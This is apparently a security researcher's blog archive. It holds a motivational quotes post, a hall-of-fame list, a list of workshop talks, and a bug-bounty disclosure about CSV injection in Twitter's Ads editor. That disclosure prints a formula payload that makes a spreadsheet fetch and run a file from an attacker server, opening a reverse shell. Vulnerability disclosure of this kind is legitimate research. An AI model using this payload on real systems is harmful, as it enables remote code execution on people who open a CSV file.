Archive for 2017

Top 10 Quotes Which Inspire Me Everyday and Reason Why you should NeverGiveUp

2 Comments
In order to be successful at anything in life, you need to first believe that you deserve to be. So for that you need to love yourself.

Loving others is easy. Loving yourself is the hard part OR so we often think. Ability to do what needs to be done, without influence from other people or situations. People with self motivation can find a reason and strength to complete a task, even when challenging, without giving up or needing another to encourage them.

A good way to be continuously self-motivated is to implement something like these 5 steps which I follow:-
1.      Stay Positive. See the good in bad.
2.      Know yourself. Keep notes on when your motivation sucks and when you feel like a superstar.
3.      Stop Over thinking. Just do.
4.      Keep good company. Make more regular encounters with positive and motivated people.
5.      Start simple and Keep learning. Read and try to take in everything you can. The more you learn, the more confident you become.

Many of us find ourselves in motivational slumps that we have to work to get out of. Sometimes it’s like a continuous cycle where we are motivated for a period of time, fall out and then have to build things back up again.
Here are my Top 10 Quotes Which Inspire Me Everyday and Reason Why you should NeverGiveUp in your life.

1.       "If you don't give up, you still have a chance"
         -  Jack Ma


Imagesource


2.      "Pay the price today so you can pay any price tomorrow."
        -   GrantCardone


Imagesource


3.      "You have to learn the rules of the game. And then you have to play better than anyone else."
            -    Albert Einstein



Imagesource



4.      "Life is like a piano. What you get out of it depends on how you play it."
       Tom Lehrer


Imagesource


5.      "Love yourself first and everything else falls into line. You really have to love yourself to get anything done in this world."
       Lucille Ball



Imagesource


6.      "Never make someone a priority when all you are to them is an option."
       Maya Angelou


Imagesource


7.      "Until you value yourself, you won’t value your time. Until you value your time, you will not do anything with it."
       M. Scott Peck


Imagesource


8.      "If someone offers you an amazing opportunity and you're not sure you can do it, say yes - then learn how to do it later."
             -  Richard Branson


Imagesource


9.      “Every next level of your life will demand a different you.”
   — Leonardo DiCaprio.


Imagesource


10.   "Ups and downs in life are very important to keep us going, because a straight line even in an ECG means we are not alive"
        -  Ratan Tata


Imagesource



Last but not least, Why I share such post and give time writing blogs, etc. many people ask me so the answer is..


"The world has enough critics. Be an encourager" -  Anonymous


Imagesource

I hope this will help you guys to motivate yourself.  If this helps you some or other way then share it with your friends and be part of the  NeverGiveUp Community.

Twitter CSV Injection - Going beyond Pop-Up Calculator to Taking Meterpreter Shell

2 Comments


Hi folks,

After a long time, I thought of publishing one of my findings. Back in time, I targeted `Twitter` Application in a hope of getting some juicy bugs.  This time I was looking into searching for some different bugs apart from looking up for XSS, SQLi etc.


tl;dr - this vulnerability is exploiting CSV injection, to gain meterpreter session on a victim's local system.

How it started :- 

I was testing one of the twitter features called ‘Ads editor’.
According to twitter, with Ads editor, you can leverage the power of Excel to manage your campaigns at scale.  That sounds cool as it is using a feature like ‘Excel’.  Also there is an option under Edit access to account in which the account admin can add different users and assign the role accordingly [Roles are: - Account Administrator, Ad Manager and Analyst ]


By this time I was pretty clear to check out "CSV Injection Attack".


Proof of Concept :- 

I noticed that the `Name your audience` field was vulnerable to CSV injection that could be chained with a meterpreter payload resulting in client side remote code execution.

I sent this bug report with all the details to the Twitter security team

And I got the below revert




But wait



HOPES ALIVE :)

I created a video POC containing full exploitation in which I was able to take reverse shell connection back to the attacker's machine by using
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0


OR
Click here for Direct Video Link

 Above payload works in such a way that when the CSV file is opened, powershell is launched in the background which attempts to grab the Powersploit payload of Invoke-Shellcode to attempt a reverse shell connection back to the attacker's server.

Well, what next..

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEt1q8x57fVeCZNmwV8z0d3wW6FkLMT6HQro2BhCqnlun9FDd9IGmbn87Cp2PZu5vJsK1LVvt6iwv2-4u5TnkHDqryl9S53UxmeK_GOZ5W1PzJ8eSbrnzDbm3P5xaLdoaeeEeMykXg3IU/s400/POC+4.jpg


This is how the life of a bug hunter looks like.

Moral Of The Story:- 
I never tried going beyond Pop-Up Calculator whenever I submitted bugs related to CSV injection, but this gave me an opportunity to exploit. So on a positive note, accept the things and then move on. And most importantly, if you fail? Well, try harder!

Time-Line:

Vulnerability timeline:

Aug 14, 2016   : Reported to Twitter Security Team via Hackerone platform.
Aug 17, 2016  :  Report marked as "Duplicate"
Aug 17, 2016  :  Report reopen and status changed to "Need More Info"
Aug 17, 2016  :  Shared the video POC exploit.
Aug 23, 2016  :  Report again marked as "Duplicate"
June 23, 2017 :  As per Hackerone Policy Responsible disclosure.

Hall Of Fame

Add Comment

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZ8HhM61GUWOfeahxjvhpVYwNtTK5VtKMTeHmc1Mci6UhHbBGEDcs3NG4qqp8a6qx4cmnccxrZKu4EUkaeNuHiVHavjspSmHWUfKXwzaJu3rfLy084VHuUKokE7NboFxC4yAv0aRcHtvQ/s400/Hall+Of+Fame.jpg


I have been helping companies improve their security by finding vulnerabilities in their software and helping them patch it, and they included me in their security acknowledgements page for reporting valid security issue issues: 






C:\Users\Nilesh\Desktop\Google-favicon-2015.png                        Google   - HOF Link  - HOF Image



https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_0ax0iGfPbBpfGhi-ifmp9BGYb2JfUG0-i3A2n9gc88AS_IJ_MceinBexaU671Q2Sl59LuxKhT5W6aENQm6raTS3nKsPEEtkaDiJ5J5iZqL9ltlgPX15yC505aoskGEYX27EuO-Ng7mI/s1600/microsoft.jpg                        MicrosoftHOF Link  - HOF Image



https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaxkWh6ZXgB3gyqQ0Weuo3CSegnlKljgTY5qcvSI3Cgf8N-7d3xXUXOGfycJHSG84jPfNdXMRHjxqFUN2kxmAmz11D-dASCxgjLSOVWQcZdLmshuZjzKLHYawe9-YtcZtr1hp_bZGingc/s200/yahoo.jpg               YahooHOF Link 
      Imagesource 


  https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqDRx3mhnd32UbzgTTIkQfGfW3qkHQMBg-66CJ2P5g7ECgoUxaBvqF-SvMUqzMU2FlOBpHBxGn3V6ZwboqJY-qtz6LNoF_Rrxvi6Ry8Aap5SHk9tLGNM82ATiM8-gqX-uVhU9ir-P_m7Q/s1600/adobe.jpg                         Adobe HOF Link 
      Imagesource


https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0qTTL8MMuSp_dB8NoI6O5b2aWXcKObNmmktnHQ_S9GFL8UeqXaH57DBVqbeESKUe2WZ2W1XwUkaFoWzUxK2Js-C-2ls3597FUH4xMiTeCyCjMGZqlNy6s0Jw85U4i2XUcglKCj1jhPVA/s1600/redhat_logo_small_.jpg                Redhat HOF Link  
       Imagesource


https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBBvBoVo3q-9mauW1C3t2cEnNHLoKGoIbk3EuvvS8ESLIxN-wwWMwoT75k7S9b0V3vd5AedJbpcCR3KkECijFIAjzvDR6_2Sz0_KmOO2N_y4yGv86k8lvtD_5ZdGZ4BUsaFUr9R9N2VC8/s1600/att.jpg                 AT&T HOF Link - HOF Image
          Imagesource



 https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWKtJhEPWXPzySA9m50vUSUKayEnLDRL-cWohrIiQnRveWZxxd0xTo1zFQ8gMYFJSU5D_kkMQOoc6y5nNHGPE5wpq2ck6EVDxtVZvz3ppSPGVrz8uzuCylFT1mMd7s6WaL3tUo3MwCdsA/s1600/bb.jpg                     BlackBerry - HOF Link
        Imagesource


 https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOYk3WL4IVON603CUdbUNSwaljQmE1HLMQHGnBqe_SKSVZmguc6ojq4WmMAiSYh1pTqwsDKBgXQo_3ki5yiv22B0Sy7DdcQm5bMzLNlCA213aRgtk3Ryu3CMqyEOyMFuLnPHOnRGfbFaQ/s1600/sony.jpg                      Sony - HOF Link 
     Imagesource



 https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYXQTfIzHvctNb7AteMuIqzcZoSEJF46QkNypvsk1ogcDs9A5FkR0DnoSh32WDYcy1V2VdfPWwdt2Ql4OGYbgdk37I4SkrEaDwydM2lPV3JdyQab59iqhg8spEIGoQY4MTihC34vDrUnI/s1600/gm.jpg                     General Motor - HOF Link 
     Imagesource 



C:\Users\Nilesh\Desktop\owasp_logo.jpg                OWASP - HOF Link 
    Imagesource 



  C:\Users\Nilesh\Desktop\cobalt-logo+mark-943a17b2ee991b50c0709e6b32b6adcfa6740e20248df51663137cc011380756.png                  Cobalt - HOF Link 
      Imagesource 



  C:\Users\Nilesh\Desktop\test.jpg                 Blockchain - HOF Link 
     Imagesource 


    C:\Users\Nilesh\Desktop\OLX_Logo.jpg                  OLX - HOF Link 
      Imagesource    


    C:\Users\Nilesh\Desktop\imgur.jpg                   ImgurHOF Link
       Imagesource    
 

And many more...
 

Conference Talks

Add Comment
The Journey :- 

 Back in time when I was a new bie in Infosec domain I was trying my hands to learn the basics of infosec this includes workshops, blogs to learn the basics. The most important question running in my mind was from where do I start so that I can make the first step up the ladder of this journey to become Ethical Hacker.

Thankfully, by the grace of God my all hard work paid off. [Big story]

My first talk was at null Mumbai chapter after that I started getting many invites from different colleges to conduct the workshop on Ethical hacking and then the journey of delivering talks began and now there is no looking back to help all the beginners and supporting all the people who are hunting the way to become hacker or info sec geek.  So now to make sure that the new bie avoid this struggle which I faced during my beginning I started helping and supporting via this medium.

In this journey many people asked "You started taking seminars or conference, so is it for the Money.. Fame.. Publicity stunt OR bla bla? " So here is the answer to all those people.


Let's come back to the current state and see what this blog section is about?

 I have conducted many Security Talks at different colleges and events which I will be listing in this section.

So if you want to conduct Security Talks at your colleges, then drop an email.
I would love to share the knowledge.


Year 2018

1] Got invited for conducting workshop on "Ethical Hacking" at Sardar Patel Institute Of Technology

Venue details:- 
SPIT College - 14th Aug 2018

Audience :- 
MCA Department






















Year 2017

 1] Got invited for conducting workshop on "Ethical Hacking - Security Attacks/Tools/Mitigation Techniques" at Shri Bhagubhai Mafatlal Polytechnic - SVKM

Venue details:- 
Shri Bhagubhai Mafatlal Polytechnic - 15th March 2017

Audience :- 
Department of Information Technology - Shri Bhagubhai Mafatlal Polytechnic







2] Got invited for conducting workshop on "AICTE-ISTE approved Ethical Hacking workshop" at SIES Graduate School of Technology

Venue details:- 
SIES Graduate School of Technology, Vidyapuram, Sector 5, Nerul, Navi Mumbai - 2nd July 2017

Audience :- 
The Computer Engineering department of SIES Graduate School of Technology
AICTE-ISTE approved Ethical Hacking workshop
AICTE :- All India Council for Technical Education (AICTE)
ISTE  :- Indian Society for Technical Education (ISTE)







3] Got invited for conducting workshop on "Ethical Hacking" at SNDT College - Shri M.D. Shah Mahila College of Arts and Commerce. 

Venue details:- 
BJ Patel Rd, Near Liberty Garden, Malad West, Mumbai, Maharashtra 400064 - 9th September 2017

Audience :- 
BCA Students











Year 2016

 1] Got invited for conducting workshop on "Cyber Security - Hands-On Workshops" at Sardar Patel Institute of Technology (SPIT)

Venue details:- 
Sardar Patel Institute of Technology - 8th Oct 2015

Audience :- 
Department of Information Technology and Masters of computer application





Year 2015

1] Got invited for conducting workshop on "Cyber Security" at Sardar Patel Institute of Technology (SPIT)

Venue details:- 
Sardar Patel Institute of Technology - 3rd Oct 2015

Audience :- 
MCA Department














 2] Conducted workshop on "It's all about CSRF" at null Mumbai Meet

Venue details :-
null Mumbai Meet 10 January 2015 Null/OWASP Mumbai Chapter Monthly Meet

Slides :-
It's all about CSRF








Year 2014

1] Conducted workshop on "Wireless Security

Venue details :-
null Mumbai Meet 13 September 2014 Null/OWASP Mumbai Chapter Monthly Meet

Slides :-
Wireless Security










Subscribe to: Posts (Atom)